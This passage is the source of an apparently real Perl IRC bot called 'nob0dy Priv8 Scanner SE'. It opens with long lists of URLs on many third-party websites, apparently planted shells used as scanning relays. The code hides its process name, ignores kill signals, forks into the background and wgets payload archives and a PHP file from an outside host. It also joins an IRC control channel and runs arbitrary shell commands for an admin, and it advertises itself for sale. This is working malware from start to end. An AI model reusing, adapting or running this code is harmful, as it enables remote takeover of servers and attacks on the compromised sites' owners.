"http://training.beekmanresources.co.za/errors.php", "http://allonymousbooks.com/errors.php", "http://www.crackbig.com/errors.php", "http://surgicalleadershipalliance.org/errors.php", "http://www.triadsquare.com/errors.php", "http://www.yogaeducational.org//errors.php", "http://www.dimensionetv.com//errors.php", "http://www.aubordduciel.fr/errors.php", "http://www.neuro-sono.med.br/errors.php", "http://condomini.caricato.eu/errors.php", "http://opieka.radom.pl/errors.php", "http://hevilemmetal.com.br/errors.php", "http://austerdigitalpunch.com/errors.php", "http://f.potolok.kg/errors.php", "http://fhdynamics.com/errors.php", "http://www.dimensionetv.com//errors.php", "http://www.fzzz.ba/phpthumb//errors.php", "http://www.fzzz.ba//errors.php", "http://www.descarsnc.it/errors.php", "http://www.veronikagazeau.com/errors.php", "http://www.teho.com.sg//errors.php", "http://core.sportandexercisemedicineacademy.co.uk/errors.php", "http://daniel123.co.za/errors.php", "http://hevilemmetal.com.br/errors.php", "http://training.beekmanresources.co.za/errors.php", "http://batizandras.hu/errors.php", "http://training.beekmanresources.co.za/errors.php", "http://kellymarielane.com/more/errors.php", "http://core.sportandexercisemedicineacademy.co.uk/errors.php", "opieka.radom.pl/errors.php", "http://www.clinicalosfundadores.cl/errors.php", "http://martysautoandtowing.com/errors.php", "http://www.derrjob.com/errors.php", "http://www.ecolombiatours.com/errors.php", "http://www.infolor.fr/errors.php", "http://www.masfarne.info/errors.php", "http://fundacioncimientos.org/errors.php", "http://constructiidelemnpegas.ro/errors.php", "http://produkcja.rolnicy.com//components/com_wrapper/errors.php", "http://dominicanway.com//components/com_alphacontent/assets/phpThumb/errors.php", "http://www.economicswork.ru//plugins/editors/errors.php", "http://lexiquedumanagement.com//components/com_alphacontent/assets/phpThumb/errors.php", "http://sellallmyideas.com/errors.php", "http://www.artiste-peintre-figuratif.com/huile-aquarelle//components/com_alphacontent/assets/phpThumb/errors.php", "http://www.cchm.ca/components/com_mailto/error.php", "http://www.bortolotto.eu/plugins/editors/error.php", "http://www.gambinigroup.it/media/mailto/error.php", "http://zemnoe.ru/wp-includes/error.php", "http://politics.cnm.com.pt/errors.php", "http://www.thermona-ekb.ru/errors.php", "http://dailyfresh.nu/Hotfrog/errors.php", "http://www.thai-orchidea.cz/modules/mod_login/error.php", "http://ivanous.free.fr/camu_s_world/images/stories/jump.php", "http://www.ecomuseudelblat.cat/errors.php", "http://dailyfresh.nu/Hotfrog/errors.php", "http://interminas.ddns.net/errors.php", "http://www.pebk.de/joomla/components/com_mailto/error.php", "http://www.thermona-ekb.ru/errors.php", "http://imotionasia.com.vn/errors.php", "http://www.orfej.si/components/com_mailto/error.php", "http://www.petropolis.rj.gov.br/intranet/components/com_mailto/error.php", "http://bioenfapesp.org/media/mailto/error.php", "http://www.tkofschip.be/joomlasites/ankerintranet5/plugins/content/config.index.php", "http://therfw.com/wp-includes/error.php", "http://bigbananawatch.com/wp-content/themes/bigbananawatch/error.php", "http://gobll.pl/errors.php", "http://www.yplittleport.org.uk/media/system/config.index.php", "http://greenpowerguy.com/blog/wp-content/themes/error.php", "http://ivanous.free.fr/camu_s_world/images/stories/jump.php", "http://www.austriasport.nl/wp-includes/errors.php", "http://www.corteganamedieval.com/components/com_content/views/section/tmpl/page-sidebar.php", "http://www.pessebristassumpcio.com/wp-includes/error.php", "http://www.thai-orchidea.cz/modules/mod_login/error.php", "http://www.flowershop-neo.com/wp-includes/error.php", "http://www.mondragonlingua.com/formacion/components/com_users/search.php", "http://exhibcouples.fr/errors.php", "http://iheld.com/errors.php", "http://www.kathleenferrari.com/errors.php", "http://www.amslight.com/errors.php", "http://pastorbonus.sk/errors.php", "http://www.saboeiro.pt/errors.php", "http://hlmais.com.br/mundo/wp-content/themes/twentyten/error.php", "http://treboliberica.com/includes/errors.php", "http://www.thermona-ekb.ru/errors.php", "http://imotionasia.com.vn/errors.php", "http://www.petropolis.rj.gov.br/intranet/components/com_mailto/error.php", "http://bioenfapesp.org/media/mailto/error.php", "http://www.tcfa1.net/errors.php", "http://dailyfresh.nu/errors.php", "http://www.cchm.ca/components/com_mailto/error.php", "http://www.bortolotto.eu/plugins/editors/error.php", "http://www.cchm.ca/components/com_mailto/error.php", "http://www.bortolotto.eu/plugins/editors/error.php", "http://www.gambinigroup.it/media/mailto/error.php", "http://zemnoe.ru/wp-includes/error.php", "http://politics.cnm.com.pt/errors.php", "http://www.thermona-ekb.ru/errors.php", "http://dailyfresh.nu/Hotfrog/errors.php", "http://www.thai-orchidea.cz/modules/mod_login/error.php" ); my @random10 = ("http://www.corteganamedieval.com/components/com_content/views/section/tmpl/page-sidebar.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://www.flatertheek.nl/wp-includes/SimplePie/HTTP/search.php", "http://newpl.imul.pl/errors.php", "http://theitaliancorner.co.uk/wp-includes/theme-compat/comments-footer.php", "http://rpaisa.com/wp-con.php", "http://www.jobsforfive.com/wp-admin/edit-link.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://www.flatertheek.nl/wp-includes/SimplePie/HTTP/search.php", "http://www.vipesrl.it/gruppo/config.inc.php", "http://newpl.imul.pl/errors.php", "http://theitaliancorner.co.uk/wp-includes/theme-compat/comments-footer.php", "http://www.vipesrl.it/gruppo/config.inc.php", "http://www.psdf.org.pk/errors.php", "http://www.ims.co.ke/errors.php", "http://www.cantalindustrie.com/wp/wp-content/themes/errors.php", "http://www.flatertheek.nl/wp-includes/SimplePie/HTTP/search.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://fusildechispas.com/errors.php", "https://www.cloudipalarm.nl/wp-content/plugins/revslider/temp/errors.php", "http://www.psdf.org.pk/errors.php", "http://www.ims.co.ke/errors.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://www.psdf.org.pk/errors.php", "http://fusildechispas.com/errors.php", "http://rpaisa.com/wp-con.php", "http://www.corteganamedieval.com/components/com_content/views/section/tmpl/page-sidebar.php", "http://www.flatertheek.nl/wp-includes/SimplePie/HTTP/search.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://fusildechispas.com/errors.php", "http://www.psdf.org.pk/errors.php", "http://www.flatertheek.nl/wp-includes/SimplePie/HTTP/search.php", "http://theitaliancorner.co.uk/wp-includes/theme-compat/comments-footer.php", "http://www.psdf.org.pk/errors.php", "https://savannasolutions.co.zm/errors.php", "http://newpl.imul.pl/errors.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://www.flatertheek.nl/wp-includes/SimplePie/HTTP/search.php", "http://rpaisa.com/wp-con.php", "https://www.cloudipalarm.nl/wp-content/plugins/revslider/temp/errors.php", "http://fusildechispas.com/errors.php", "http://rpaisa.com/wp-con.php", "http://ersaf.it/errors.php", "http://www.xinh-sushi.de/errors.php", "http://www.fhdynamics.com/errors.php", "http://cilfowyr.co.uk/errors.php", "http://www.scribbly.net/2013/errors.php", "http://www.dso.phpcmsmodx.info/core/components/elrte/testing//errors.php", "http://core.sportandexercisemedicineacademy.co.uk/errors.php", "http://portalacademicounid.we-know.net/LearnDash/errors.php", "http://djltraining.trainingassociates.us/errors.php", "http://simplychristianbookclub.com/errors.php", "http://kellymarielane.com/more/errors.php", "http://training.beekmanresources.co.za/errors.php", "http://allonymousbooks.com/errors.php", "http://www.crackbig.com/errors.php", "http://surgicalleadershipalliance.org/errors.php", "http://www.triadsquare.com/errors.php", "http://www.yogaeducational.org//errors.php", "http://www.dimensionetv.com//errors.php", "http://www.aubordduciel.fr/errors.php", "http://www.neuro-sono.med.br/errors.php", "http://condomini.caricato.eu/errors.php", "http://opieka.radom.pl/errors.php", "http://hevilemmetal.com.br/errors.php", "http://austerdigitalpunch.com/errors.php", "http://f.potolok.kg/errors.php", "http://fhdynamics.com/errors.php", "http://www.dimensionetv.com//errors.php", "http://www.fzzz.ba/phpthumb//errors.php", "http://www.fzzz.ba//errors.php", "http://www.descarsnc.it/errors.php", "http://www.veronikagazeau.com/errors.php", "http://www.teho.com.sg//errors.php", "http://core.sportandexercisemedicineacademy.co.uk/errors.php", "http://daniel123.co.za/errors.php", "http://hevilemmetal.com.br/errors.php", "http://training.beekmanresources.co.za/errors.php", "http://batizandras.hu/errors.php", "http://training.beekmanresources.co.za/errors.php", "http://kellymarielane.com/more/errors.php", "http://core.sportandexercisemedicineacademy.co.uk/errors.php", "opieka.radom.pl/errors.php", "http://www.clinicalosfundadores.cl/errors.php", "http://martysautoandtowing.com/errors.php", "http://www.derrjob.com/errors.php", "http://www.ecolombiatours.com/errors.php", "http://www.infolor.fr/errors.php", "http://www.masfarne.info/errors.php", "http://fundacioncimientos.org/errors.php", "http://constructiidelemnpegas.ro/errors.php", "http://produkcja.rolnicy.com//components/com_wrapper/errors.php", "http://dominicanway.com//components/com_alphacontent/assets/phpThumb/errors.php", "http://www.economicswork.ru//plugins/editors/errors.php", "http://lexiquedumanagement.com//components/com_alphacontent/assets/phpThumb/errors.php", "http://sellallmyideas.com/errors.php", "http://www.artiste-peintre-figuratif.com/huile-aquarelle//components/com_alphacontent/assets/phpThumb/errors.php", "http://www.cchm.ca/components/com_mailto/error.php", "http://www.bortolotto.eu/plugins/editors/error.php", "http://www.gambinigroup.it/media/mailto/error.php", "http://zemnoe.ru/wp-includes/error.php", "http://politics.cnm.com.pt/errors.php", "http://www.thermona-ekb.ru/errors.php", "http://dailyfresh.nu/Hotfrog/errors.php", "http://www.thai-orchidea.cz/modules/mod_login/error.php", "http://ivanous.free.fr/camu_s_world/images/stories/jump.php", "http://www.ecomuseudelblat.cat/errors.php", "http://dailyfresh.nu/Hotfrog/errors.php", "http://interminas.ddns.net/errors.php", "http://www.pebk.de/joomla/components/com_mailto/error.php", "http://www.thermona-ekb.ru/errors.php", "http://imotionasia.com.vn/errors.php", "http://www.orfej.si/components/com_mailto/error.php", "http://www.petropolis.rj.gov.br/intranet/components/com_mailto/error.php", "http://bioenfapesp.org/media/mailto/error.php", "http://www.tkofschip.be/joomlasites/ankerintranet5/plugins/content/config.index.php", "http://therfw.com/wp-includes/error.php", "http://bigbananawatch.com/wp-content/themes/bigbananawatch/error.php", "http://gobll.pl/errors.php", "http://www.yplittleport.org.uk/media/system/config.index.php", "http://greenpowerguy.com/blog/wp-content/themes/error.php", "http://ivanous.free.fr/camu_s_world/images/stories/jump.php", "http://www.austriasport.nl/wp-includes/errors.php", "http://www.corteganamedieval.com/components/com_content/views/section/tmpl/page-sidebar.php", "http://www.pessebristassumpcio.com/wp-includes/error.php", "http://www.thai-orchidea.cz/modules/mod_login/error.php", "http://www.flowershop-neo.com/wp-includes/error.php", "http://www.mondragonlingua.com/formacion/components/com_users/search.php", "http://exhibcouples.fr/errors.php", "http://iheld.com/errors.php", "http://www.kathleenferrari.com/errors.php", "http://www.amslight.com/errors.php", "http://pastorbonus.sk/errors.php", "http://www.saboeiro.pt/errors.php", "http://hlmais.com.br/mundo/wp-content/themes/twentyten/error.php", "http://treboliberica.com/includes/errors.php", "http://www.thermona-ekb.ru/errors.php", "http://imotionasia.com.vn/errors.php", "http://www.petropolis.rj.gov.br/intranet/components/com_mailto/error.php", "http://bioenfapesp.org/media/mailto/error.php", "http://www.tcfa1.net/errors.php", "http://dailyfresh.nu/errors.php", "http://www.cchm.ca/components/com_mailto/error.php", "http://www.bortolotto.eu/plugins/editors/error.php", "http://www.cchm.ca/components/com_mailto/error.php", "http://www.bortolotto.eu/plugins/editors/error.php", "http://www.gambinigroup.it/media/mailto/error.php", "http://zemnoe.ru/wp-includes/error.php", "http://politics.cnm.com.pt/errors.php", "http://www.thermona-ekb.ru/errors.php", "http://dailyfresh.nu/Hotfrog/errors.php", "http://www.thai-orchidea.cz/modules/mod_login/error.php" ); my $full = $random[rand(scalar(@random))]; my $full1 = $random1[rand(scalar(@random1))]; my $full2 = $random2[rand(scalar(@random2))]; my $full3 = $random3[rand(scalar(@random3))]; my $full4 = $random4[rand(scalar(@random4))]; my $full5 = $random5[rand(scalar(@random5))]; my $full6 = $random6[rand(scalar(@random6))]; my $full7 = $random7[rand(scalar(@random7))]; my $full8 = $random8[rand(scalar(@random8))]; my $full9 = $random9[rand(scalar(@random9))]; my $full10 = $random10[rand(scalar(@random10))]; my $jack = "".$full.$pgfa.""; my $jackx = "".$full.$pgfa.""; my $jackx1 = "".$full1.$pgfa.""; my $jackx2 = "".$full2.$pgfa.""; my $jackx3 = "".$full3.$pgfa.""; my $jackx4 = "".$full4.$pgfa.""; my $jackx5 = "".$full5.$pgfa.""; my $jackx6 = "".$full6.$pgfa.""; my $jackx7 = "".$full7.$pgfa.""; my $jackx8 = "".$full8.$pgfa.""; my $jackx9 = "".$full9.$pgfa.""; my $jackx10 = "".$full10.$pgfa.""; my $jackxx = $lobex[rand(scalar(@lobex))]; my $jack1 = "".$jackxx.$pgfa.""; my $jack2 = "".$jackxx.$pgfa.""; my $jack3 = "".$jackxx.$pgfa.""; my $jack4 = "".$jackxx.$pgfa.""; my $jack5 = "".$jackxx.$pgfa.""; my $jack6 = "".$jackxx.$pgfa.""; my $jack7 = "".$jackxx.$pgfa.""; my $jack8 = "".$jackxx.$pgfa.""; my $jack9 = "".$jackxx.$pgfa.""; my $jack10 = "".$jackxx.$pgfa.""; if (@ARGV == 7) { print "\n[+] nob0dy Priv8 Scanner SE\n". "[+] IRC Host : $ircserver\n". "[+] IRC Port : $ircport\n". "[+] Bot Nick : $nickname\n". "[+] Bot Ident : $ident\n". "[+] Channel : $channel\n". "[+] Bot Admin : $admin\n". "[+] Process/PID : $fakeproc - $$\n\n"; } $SIG{'INT'} = 'IGNORE'; $SIG{'HUP'} = 'IGNORE'; $SIG{'TERM'} = 'IGNORE'; $SIG{'CHLD'} = 'IGNORE'; $SIG{'PS'} = 'IGNORE'; my @User_Agent = &Agent(); #chdir("/tmp"); chop (my $priper = `wget http://www.soaresrama.pt/wp-includes/fonts/eaxt/wwwx/revslider.zip ; wget http://www.soaresrama.pt/wp-includes/fonts/eaxt/wwwx/mage.tgz ; wget http://www.soaresrama.pt/wp-includes/fonts/eaxt/wwwx/magnum.zip ; wget http://www.soaresrama.pt/wp-includes/fonts/eaxt/wwwx/info.aff ; cp info.aff style.php.ndsfx ; cp info.aff style.php.php ; cp info.aff style.php ; cp info.aff info.phtml ; cp info.aff info.php ; mv info.aff info.inc.gif `); $ircserver = "$ARGV[0]" if $ARGV[0]; $0 = "$fakeproc"."\0" x 16; my $pid = fork; exit if $pid; die "\n[!] Something Wrong !!!: $!\n\n" unless defined($pid); our %irc_servers; our %DCC; my $dcc_sel = new IO::Select->new(); $sel_client = IO::Select->new(); sub sendraw { if ($#_ == '1') { my $socket = $_[0]; print $socket "$_[1]\n"; } else { print $IRC_cur_socket "$_[0]\n"; } } sub connector { my $mynick = $_[0]; my $ircserver_con = $_[1]; my $ircport_con = $_[2]; my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$ircserver_con", PeerPort=>$ircport_con) or return(1); if (defined($IRC_socket)) { $IRC_cur_socket = $IRC_socket; $IRC_socket->autoflush(1); $sel_client->add($IRC_socket); $irc_servers{$IRC_cur_socket}{'host'} = "$ircserver_con"; $irc_servers{$IRC_cur_socket}{'port'} = "$ircport_con"; $irc_servers{$IRC_cur_socket}{'nick'} = $mynick; $irc_servers{$IRC_cur_socket}{'myip'} = $IRC_socket->sockhost; nick("$mynick"); sendraw("USER $ident ".$IRC_socket->sockhost." $ircserver_con :$fullname"); sleep 1; } } sub parse { my $servarg = shift; if ($servarg =~ /^PING \:(.*)/) { sendraw("PONG :$1"); } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) { if (lc($1) eq lc($mynick)) { $mynick = $4; $irc_servers{$IRC_cur_socket}{'nick'} = $mynick; } } elsif ($servarg =~ m/^\:(.+?)\s+433/i) { nick("$mynick".int rand(999)); } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) { $mynick = $2; $irc_servers{$IRC_cur_socket}{'nick'} = $mynick; $irc_servers{$IRC_cur_socket}{'nome'} = "$1"; sendraw("MODE $mynick +Bx"); sendraw("NS id alin123"); sleep(3); sendraw("JOIN $channel"); sleep(1); sendraw("JOIN $chanxxx o"); sendraw("JOIN $base o"); sleep(1); #sendraw("PRIVMSG $channel :4Ready to work boss"); sendraw("PRIVMSG $admin :Hi $admin im here number ".$number." with pid $$ !!!"); } } my $line_temp; while( 1 ) { while (!(keys(%irc_servers))) { connector("$nickname", "$ircserver", "$ircport"); } select(undef, undef, undef, 0.01); delete($irc_servers{''}) if (defined($irc_servers{''})); my @ready = $sel_client->can_read(0); next unless(@ready); foreach $fh (@ready) { $IRC_cur_socket = $fh; $mynick = $irc_servers{$IRC_cur_socket}{'nick'}; $nread = sysread($fh, $ircmsg, 4096); if ($nread == 0) { $sel_client->remove($fh); $fh->close; delete($irc_servers{$fh}); } @lines = split (/\n/, $ircmsg); $ircmsg =~ s/\r\n$//; if ($ircmsg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) { my ($nick,$ident,$host,$path,$msg) = ($1,$2,$3,$4,$5); my $engine ="UAE,Myanmar,Argentina,Austria,Australia,Brazil,Canada,Chili,CoMersil,Czech,Germany,Denmark,Spain,Europe,France,Hungary,Indonesia,Israel,India,Info,Iran,Italy,Japan,Korea,Mexico,Malaysia,Network,Netherlands,Organization,Philippines,Polan,Romania,Russian,Thailand,Ukraine,England,USA,Slovenia,Belgium,Bussines,SouthAfrica,Vietnam,Tuvalu,Cocos,Turky,Asia,Serbia,Singapore,Taiwan,Sweden,Pakistan,Norway,Montenegro,Greece,Education,Goverment,Kazakhstan,Afganistan,Albania,Algeria,Angola,Armenia,Azerbaijan,Bahrain,Bangladesh,Belarus,Bhutan,Bolivia,Bosnia,Bulgaria,Brunei,Cambodia,Cameroon,Christmas,CostaRika,Croatia,Cuba,Cyprus,Dominican,Equador,Egypt,Estonia,Finland,Georgia,Ghana,Grenada,Honduras,Hongkong,Iceland,Ireland,Kenya,Kuwait,Laos,Latvia,Liberia,Libyan,Lithuania,Macedonia,Malta,Mongolia,Mozambique,Namibia,Nauru,Nepal,NewZealand,Nigeria,Paraguay,Peru,Portugal,PuertoRico,Qatar,SaintLucia,Samoa,SaudiArabia,Senegal,Slovakia,Srilanka,Swaziland,Tajikistan,Tanzania,Tokelau,Tonga,Tunisia,Uruguay,Uzbekistan,Venezuela,Yemen,Yugoslavia,Zambia,Uganda,Trinidad,Zimbabwe,JacKAC,JacKAD,JacKAE,JacKAF,JacKAG,JacKAL,JacKAM,JacKAN,JacKAT,JacKAR,JacKAU,JacKBE,JacKHU,JacKOrG,JacKCoM,JacKNeT,JacKPL,JacKIT,JacKID,JacKMY,JacKES,JacKUK,JacKUS,JacKJP,JacKXXX,JacKTEL,JacKTV,JacKCC,JacKMIL,JacKASIA,JacKNAME,JacKPRO,JacKTRAVEL,JacKJOBS,JacKMOBI,JacKAERO,JacKCAT,JacKCOOP,JacKEDU,JacKGOV,JacKMUSEUM,JacKKR,JacKDE,JacKDK,JacKCA,JacKBR,JacKRO,JacKRU,JacKNL,JacKInfO,JacKFR,JacKIN,JacKMX,JacKCZ,JacKCL,JacKUA,JacKCN,JacKIR,JacKTH,JacKEU,JacKPH,JackIL,JackIM,JacKSI,JacKBIZ,JacKAS,JacKAI,JacKAG,JacKAZ,JacKBH,JacKBD,JacKBZ,JacKBO,JacKBA,JacKBW,JacKVG,JacKBG,JacKBI,JacKCO,JacKCD,JacKCG,JacKCK,JacKCR,JacKHR,JacKCU,JacKCI,JacKDJ,JacKDM,JacKDO,JacKEC,JacKEG,JacKSV,JacKEE,JacKET,JacKFJ,JacKFI,JacKGM,JacKGI,JacKGR,JacKGL,JacKGT,JacKGG,JacKHT,JacKHN,JacKHK,JacKIS,JacKIE,JacKIM,JacKJE,JacKJO,JacKKZ,JacKKE,JacKKG,JacKLV,JacKLS,JacKLY,JacKLI,JacKLT,JacKLU,JacKMW,JacKMT,JacKMU,JacKFM,JacKMN,JacKMS,JacKMA,JacKNA,JacKNP,JacKNZ,JacKNI,JacKNF,JacKNO,JacKOM,JacKPK,JacKPA,JacKPY,JacKPE,JacKPN,JacKPT,JacKPR,JacKQA,JacKRW,JacKSH,JacKSM,JacKSA,JacKSN,JacKSC,JacKSG,JacKSK,JacKZA,JacKLK,JacKVC,JacKSE,JacKCH,JacKTW,JacKTJ,JacKBS,JacKTO,JacKTT,JacKTR,JacKTM,JacKVI,JacKUG,JacKUY,JacKUZ,JacKVE,JacKVN,JacKZM,GooGLe,BingDE,BingUK,BingCA,BingBR,BingFR,BingES,BingIT,BingBE,BingNL,BingPT,BingNO,BingDK,BingSE,BingCH,BingNZ,BingRU,BingJP,BingCN,BingKR,BingMX,BingAR,BingCL,BingAU,BingAE,BingAT,BingCZ,BingEU,BingHU,BingID,BingIL,BingIN,BingINFO,BingIR,BingMY,BingNET,BingORG,BingPH,BingPL,BingRO,BingTH,BingUA,BingUS,BingSI,BingBIZ,BingXXX,BingTV,BingCC,BingMIL,BingASIA,BingNAME,BingPRO,BingTRAVEL,BingJOBS,BingMOBI,BingAERO,BingCAT,BingCOOP,BingEDU,BingGOV,BingBO,BingBA,BingBW,BingBG,BingCO,BingCR,BingHR,BingDO,BingEC,BingGR,BingHN,BingHK,BingIS,BingIE,BingKZ,BingKE,BingKG,BingLV,BingLY,BingLT,BingLU,BingMA,BingNP,BingPK,BingPR,BingSG,BingSK,BingZA,BingLK,BingTW,BingTR,BingVE,BingVN,BingMUSEUM,AsKCA,AsKDE,AsKIT,AsKFR,AsKES,AsKRU,AsKNL,AsKUK,AsKBR,AsKPL,AsKAU,AsKAT,AsKJP,AsKSE,AsKMX,AsKNO,AsKDK,Yahoo2,KvaSiR,QuinT,Pagina,Clix,ask2,WaLLa,YaHoo,AsK,Bing,OnEt,CLusTy,SaPo,AoL,UoL,LyCos,HotBot,BigLobe,SeZNam,googleAC,googleAD,googleAE,googleAF,googleAG,googleAL,googleAM,googleAN,googleAT,googleAR,googleAU,googleBE,googleHU,googleOrG,googleCoM,googleNeT,googlePL,googleIT,googleID,googleMY,googleES,googleUK,googleUS,googleJP,googleXXX,googleTEL,googleTV,googleCC,googleMIL,googleASIA,googleNAME,googlePRO,googleTRAVEL,googleJOBS,googleMOBI,googleAERO,googleCAT,googleCOOP,googleEDU,googleGOV,googleMUSEUM,googleKR,googleDE,googleDK,googleCA,googleBR,googleRO,googleRU,googleNL,googleInfO,googleFR,googleIN,googleMX,googleCZ,googleCL,googleUA,googleCN,googleIR,googleTH,googleEU,googlePH,googleIL,googleIM,googleSI,googleBIZ,googleAS,googleAI,googleAG,googleAZ,googleBH,googleBD,googleBZ,googleBO,googleBA,googleBW,googleVG,googleBG,googleBI,googleCO,googleCD,googleCG,googleCK,googleCR,googleHR,googleCU,googleCI,googleDJ,googleDM,googleDO,googleEC,googleEG,googleSV,googleEE,googleET,googleFJ,googleFI,googleGM,googleGI,googleGR,googleGL,googleGT,googleGG,googleHT,googleHN,googleHK,googleIS,googleIE,googleIM,googleJE,googleJO,googleKZ,googleKE,googleKG,googleLV,googleLS,googleLY,googleLI,googleLT,googleLU,googleMW,googleMT,googleMU,googleFM,googleMN,googleMS,googleMA,googleNA,googleNP,googleNZ,googleNI,googleNF,googleNO,googleOM,googlePK,googlePA,googlePY,googlePE,googlePN,googlePT,googlePR,googleQA,googleRW,googleSH,googleSM,googleSA,googleSN,googleSC,googleSG,googleSK,googleZA,googleLK,googleVC,googleSE,googleCH,googleTW,googleTJ,googleBS,googleTO,googleTT,googleTR,googleTM,googleVI,googleUG,googleUY,googleUZ,googleVE,googleVN,googleZM,googleWS,googleAF,googleAX,googleAL,googleDZ,googleAO,googleAQ,googleAM,googleAW,googleAC,googleBJ,googleBM,googleBT,googleBW,googleIO,googleBN,googleBF,googleKH,googleCM,googleCV,googleKY,googleCF,googleCX,googleCW,googleCY,googleFK,googleFO,googleGH,googleGD,googleGP,googleGU,googleGN,googleGY,googleHM,googleIQ,googleJM,googleKI,googleKW,googleLA,googleLB,googleLR,googleMO,googleMG,googleMV,googleMP,googleMQ,googleMR,googleYT,googleMD,googleMC,googleME,googleMZ,googleNR,googleNC,googleNG,googleNU,googlePW,googlePS,googleCQ,googleRE,googleLC,googlePM,googleST,googleRS,googleGS,googleSL,googleSX,googleSB,googleSO,googleSU,googleKN,googleSR,googleSZ,googleTZ,googleTL,googleTG,googleTK,googleTN,googleTC,googleVU,googleWF,googleYW,googleZW,GooGLeCA,GooGLeDE,GooGLeUK,GooGLeFR,GooGLeES,GooGLeIT,GooGLeNL,GooGLeBE,GooGLeCH,GooGLeSE,GooGLeDK,GooGLeNO,GooGLeNZ,GooGLeIE,GooGLeBR,GooGLeAR,GooGLeCO,GooGLeCU,GooGLeCL,GooGLeMX,GooGLeAU,GooGLeRU,GooGLeAT,GooGLePL,GooGLeIL,GooGLeTR,GooGLeUA,GooGLeGR,GooGLeJP,GooGLeCN,GooGLeMY,GooGLeTH,GooGLeIN,GooGLeKR,GooGLeRO,GooGLeTW,GooGLeZA,GooGLePT,GooGLeCZ,GooGLeEU,GooGLeHU,GooGLeID,GooGLePH,GooGLeSI,GooGLeCAT,GooGLeBO,GooGLeBA,GooGLeCR,GooGLeHR,GooGLeEC,GooGLeFI,GooGLeHN,GooGLeHK,GooGLeIS,GooGLeKZ,GooGLeKE,GooGLeLV,GooGLeLT,GooGLeLU,GooGLeMW,GooGLeMT,GooGLeMA,GooGLeNP,GooGLePK,GooGLePR,GooGLeSA,GooGLeSN,GooGLeSG,GooGLeSK,GooGLeCH,GooGLeVE,GooGLeVN"; if ($path eq $mynick) { if ($msg =~ /^PING (.*)/) { sendraw("NOTICE $nick :PING $1"); } #if ($msg =~ /^VERSION/) { # sendraw("NOTICE $nick :VERSION mIRC v6.21 Khaled Mardam-Bey"); #} if ($msg =~ /^TIME/) { sendraw("NOTICE $nick :TIME ".$datetime.""); } if (&isAdmin($nick) && $msg eq "!die") { &shell("$path","kill -9 $$"); } if (&isAdmin($nick) && $msg eq "!killall") { &shell("$path","killall -9 perl"); } if (&isAdmin($nick) && $msg eq "!reset") { sendraw("QUIT :Restarting..."); } if (&isAdmin($nick) && $msg =~ /^!join \#(.+)/) { sendraw("JOIN #".$1); } if (&isAdmin($nick) && $msg =~ /^!part \#(.+)/) { sendraw("PART #".$1); } if (&isAdmin($nick) && $msg =~ /^!nick (.+)/) { sendraw("NICK ".$1); } if (&isAdmin($nick) && $msg =~ /^!timot\s+(.*) -d/) { $newtimot = $1; $timot = $newtimot; &msg("$admin","9,1 Get Content TimeOut change to4 $timot "); } if (&isAdmin($nick) && $msg =~ /^!pid/) { sendraw($IRC_cur_socket, "PRIVMSG $nick :Fake Process/PID : $fakeproc - $$"); } if (&isAdmin($nick) && $msg !~ /^!/) { &shell("$nick","$msg"); } } else { if (&isAdmin($nick) && $msg eq "!die") { &shell("$path","kill -9 $$"); } if (&isAdmin($nick) && $msg eq "!killall") { &shell("$path","killall -9 perl"); } if (&isAdmin($nick) && $msg eq "!reset") { sendraw("QUIT :Restarting..."); } if (&isAdmin($nick) && $msg =~ /^!join \#(.+)/) { sendraw("JOIN #".$1); } if (&isAdmin($nick) && $msg eq "!part") { sendraw("PART $path"); } if (&isAdmin($nick) && $msg =~ /^!part \#(.+)/) { sendraw("PART #".$1); } if (&isAdmin($nick) && $msg =~ /^\.sh (.*)/) { &shell("$path","$1"); } if (&isAdmin($nick) && $msg =~ /^$mynick (.*)/) { &shell("$path","$1"); } if (&isAdmin($nick) && $msg =~ /^!addadmin\ (.+) /) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { $newadmin = $1; $admin = $newadmin; &msg("$path","12 Admin added to4 $admin "); }}} ##################################################################### HELP COMMAND if ($msg=~ /^!help/) { my $helplogo = "14(7@2Help14)"; $inject = ""; if (-e ($update_file)){ $inject = "3Ready!!!"; } else { $inject = "4Lost!!!"; } &msg("$nick","6add my icq 7[ 711690616 ] 100USD for sell"); } if ($msg=~ /^!respon/ || $msg=~ /^!im/) { $inject = ""; if (-e ($update_file)){ $inject = "3Ready!!!"; } else { $inject = "4Lost!!!"; } &msg("$path","12Injector : $inject "); } if (&isAdmin($nick) && $msg =~ /^!pid/) { ¬ice("$nick","6Fake Process/PID : $fakeproc - $$"); } if ($msg=~/^!bow/){ if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &msg("$path","Checking 10 Bypass, please wait..."); my $bystats1 = "";my $bystats2 = "";my $bystats3 = "";my $bystats4 = "";my $bystats5 = "";my $bystats6 = "";my $bystats7 = "";my $bystats8 = "";my $bystats9 = "";my $bystats10 = ""; my $bystats11 = "";my $bystats12 = "";my $bystats13 = "";my $bystats14 = "";my $bystats15 = "";my $bystats16 = "";my $bystats17 = "";my $bystats18 = "";my $bystats19 = "";my $bystats20 = ""; my $cekby1 = &get_content($jack1."search"); if ($cekby1 =~ /search/i){ $bystats1 = "6Up!!!"; } else { $bystats1 = "4lost!!!"; } my $cekby2 = &get_content($jack2."search"); if ($cekby2 =~ /search/i){ $bystats2 = "6Up!!!"; } else { $bystats2 = "4lost!!!"; } my $cekby3 = &get_content($jack3."search"); if ($cekby3 =~ /search/i){ $bystats3 = "6Up!!!"; } else { $bystats3 = "4lost!!!"; } my $cekby4 = &get_content($jack4."search"); if ($cekby4 =~ /search/i){ $bystats4 = "6Up!!!"; } else { $bystats4 = "4lost!!!"; } my $cekby5 = &get_content($jack5."search"); if ($cekby5 =~ /search/i){ $bystats5 = "6Up!!!"; } else { $bystats5 = "4lost!!!"; } &msg("$path","12 Mesin1=$bystats1 12Mesin2=$bystats2 12Mesin3=$bystats3 12Mesin4=$bystats4 